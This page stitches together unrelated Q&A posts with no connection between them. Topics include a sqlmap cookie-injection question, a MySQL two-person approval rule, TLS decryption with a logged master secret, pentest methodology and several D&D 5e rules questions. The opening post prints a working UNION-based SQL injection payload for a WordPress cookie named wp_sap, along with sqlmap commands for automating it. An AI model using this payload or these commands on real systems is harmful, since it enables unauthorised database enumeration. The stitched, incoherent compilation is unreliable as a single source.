SQLMap Cookie Injectioin with Working Manual SQLi

I’m using an existing exploit which calls for a cookie called wp_sap to be set with the following value:

["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] 

This works great manually. Now, I’d like to be able to use this within SQLMap to enumerate the database automatically but have been struggling. I’ve tried the following variations to no avail.

sqlmap --cookie "wp_sap=[\"1650149780')) OR 1=2 " -u http://sandbox.local -p "wp_sap" --dbms "MariaDB" --suffix "#]" --level 5 --technique U -proxy  sqlmap --cookie="wp_sap=*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --prefix "[\"1650149780')) OR 1=2" --suffix "11#]" --level 5 --technique U -proxy  sqlmap --cookie="wp_sap=[\"1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --suffix ",11#]" --level 5 --technique U -proxy 

I’d really appreciate some help to get this working.

Two persons-rule on MySQL databases for “manual fixes”

In order to “harden” our compliance, we wanted to enforce a two-persons rule on the MySQL production database for “manual fixes”. Such “manual fixes” frequently arise due to:

  • Bug in the application (we are a fast company :D)
  • Various customer requests that do not have an application feature implemented yet, such as GDPR update requests, special discounts, etc.

We wanted a process that does not require the two persons to be physically side-by-side. One person is on-call, rather junior and is responsible to translate customer service requests into SQL. They might need a GUI (such as MySQL Workbench) to navigate the complex data model and figure out the exact SQL script to produce. The SQL script should feature SELECTs showing the data before and after the change in a non-committed transaction (e.g., AUTOCOMMIT OFF no COMMIT at the end).

The second person is not on-call, rather senior, and fairly familiar with the application’s data model. They should be able to look at the SQL script the non-committed transaction output, and approve or reject via a mobile app during the evening.

We cannot be the first to have this or a similar requirements.

Does anyone know good documentation or tooling to implement such a process?

Here are some similar questions on the topic, but not quite as specific as the present one:

  • What can a company do against insiders going rogue and negatively affecting essential infrastructure?
  • How can two-man control be implemented efficiently?

Manual TLS decryption with master secret

Assuming I have the master secret from SSLKEYLOGFILE client random, and server random, can I decrypt any tls traffic captured? I’ve started from Golang’s TLS implementation, pulled the connection stuff out, had it generate the keys and iv from the values above (https://github.com/golang/go/blob/cd18da451faedc4218a5fd0e38f9b3d13aa5da01/src/crypto/tls/prf.go#L121), but still can’t decrypt.

Thoughts? Is one able to generally decrypt any TLS (given correct version and cipher) with one instance implementation, like Golang’s?

How do the damage rules from blogofholding’s “5e monster manual on a business card” work?

5e monster manual on a business card

Damage: This is the damage budget for all the monster’s attacks. Limited-use (daily, recharge, or situational) attacks do 4x the damage budgeted. Multi-target attacks do ½ the damage budgeted. Limited-use multi-target attacks do 2x. All other damage sources are 1 for 1, including at-will and legendary single-target attacks, auras, reactions, and variable-length effects like Swallow. If a monster has several at-will options (such as melee and ranged), the lower-damage options are free.

The example stat block that the author uses to illustrate these rules involves a low-level creature that can only make a single attack per round, and in this situation the rules seem to work out. I’m having more trouble figuring out how the rules work when you start throwing multiattack into the mix or when you get into the higher levels with powerful creatures that have legendary actions, for instance.

The Monster Manual lists the Adult Red Dragon as a CR 17 creature. According to the blog’s rules, this would give it a damage budget of 85. The dragon’s fire breath is a limited-use, multi-target attack that deals an average of 63 points of damage to those who fail their saves, so as per the rules this should use up 31 out of the 85 budget, leaving 54.

The legendary Wing Attack also falls into this category and so should use up 7 more of the budget, leaving 47.

The blog’s rules indicate that only the most powerful at-will attack, which is a 1 for 1 on the budget cost, requires any budget, which means that the Bite attack eats up the 26 of the remaining budget, leaving 21.

Is this correct? Does the fact that the dragon has multiattack come into play in the budget calculations? Or is it that the dragon is a powerful creature and thus based on “concept” it should be up to 50% higher on the damage budget? In this case, we’re looking at a budget of up to 127, and then it seems like accounting for every attack available works out: 31 for the breath weapon, 7 for the wing attack, 26 for the bite, 15 x 2 for the claws, 17 for the tail, for a total of 111.

What resistances does an Imp have in recent printings of the Monster Manual?

My copy of the Player’s Handbook and my copy of the Monster Manual both state that an Imp has resistance to:

[…] bludgeoning, piercing, and slashing from nonmagical weapons that aren’t silvered.

And then DnD Beyond (without buying any books there) states:

[…] Bludgeoning, Piercing, and Slashing from Nonmagical Attacks that aren’t Silvered

Meanwhile the Player’s Handbook errata states:

bludgeoning, piercing, and slashing from nonmagical attacks not made with silvered weapons.

And the Monster Manual errata states:

Throughout the book, instances of “nonmagical weapons” in Damage Resistances/Immunities entries have been replaced with “nonmagical attacks.”

Applying this exact update would make my book state:

bludgeoning, piercing, and slashing from nonmagical attacks that aren’t silvered.

This matches DnD Beyond’s description but “attacks that aren’t silvered” sounds very off/wrong to me. I have no idea if this wording actually exists in the printings of the Monster Manual, it is just what the errata states.

Which of these wordings, if any, is correct; what is the wording in more/most recent printings of the Monster Manual? If this wording conflicts with the Player’s Handbook errata, which one takes precedence?

Web server attack methodology: why bother with manual tests if vulnerability scanner does it all?

I’m reading a white hat hacking book from a famous certification. They say the methodology for hacking a web server is:

  • information gathering (domain name, DNS, IP, etc.)
  • footprinting (ex: banner grabing)
  • website mirroring
  • vulnerability scanning
  • session hijacking
  • password cracking

Apart from session hijacking and information gathering, I don’t see why I would not just launch Acunetix Web App Scanner and/or Nessus to find all weaknesses.

What is the point of performing manual tests if you can automate them?

For instance, if the vulnerability scanner does not know how to find vulnerable cookies, and if I manually find a way to do session hijacking, I wont be able to train Acunetix of Nessus for that. Even if I did, I don’t how beneficial it would be.

Please explain to me why I would not just let my tool do the hacking for me.

Can the manual and tome magic items that increase stats be used multiple times by bypassing the century wait time via the spell Sequester?

Assume we have a Wizard who is at least level 13 and can reliably cast Sequester many times (either through acquired spell scrolls, or has acquired enough material components for it to be a non-issue), has a safe place (through the spell Demiplane) to be under the influence of Sequester for many centuries, and has access to the Manual of Bodily Health, Manual of Gainful Exercise, Manual of Quickness of Action, Tome of Clear Thought, Tome of Leadership and Influence, and Tome of Understanding.

Per the item descriptions in the DMG:

…your [STAT] score increases by 2, as does your maximum for that score. The manual then loses its magic, but regains it in a century.

Now, normally this would be a once-in-a-lifetime use, or maybe twice (due to the lifespan of the races), but if a wizard used Sequester on themself, many years can pass without growing older:

…[willing target creature] falls into a state of suspended animation. Time ceases to flow for it, and it doesn’t grow older. You can set a condition for the spell to end [before the spell is dispelled by the caster].

So, assuming that time continues to flow for the magic items, but not for the sequestered wizard, can they study these books and take the necessary long rests, Sequester for a hundred years, “wake” from the Sequester, and then repeat an arbitrary-but-finite number of times for an arbitrarily high (but finite) improvement to their stats?

To end the cycle and escape the demiplane, the wizard would simply Plane Shift out:

…You can specify a target destination in general terms … and you appear in or near that destination.

Does 5e have a Manual of the planes?

I’m building a Warlock with an Archfey patron, and I want to read more about the Feywild. I remember the AD&D Manual of the planes and it had information from all the planes. Does 5e have one of these? If not, is there a place I can read in-depth about the Archfey and the Feywild? (Similar information on Hell, demon princes, and the Abyss would also be greatly appreciated.)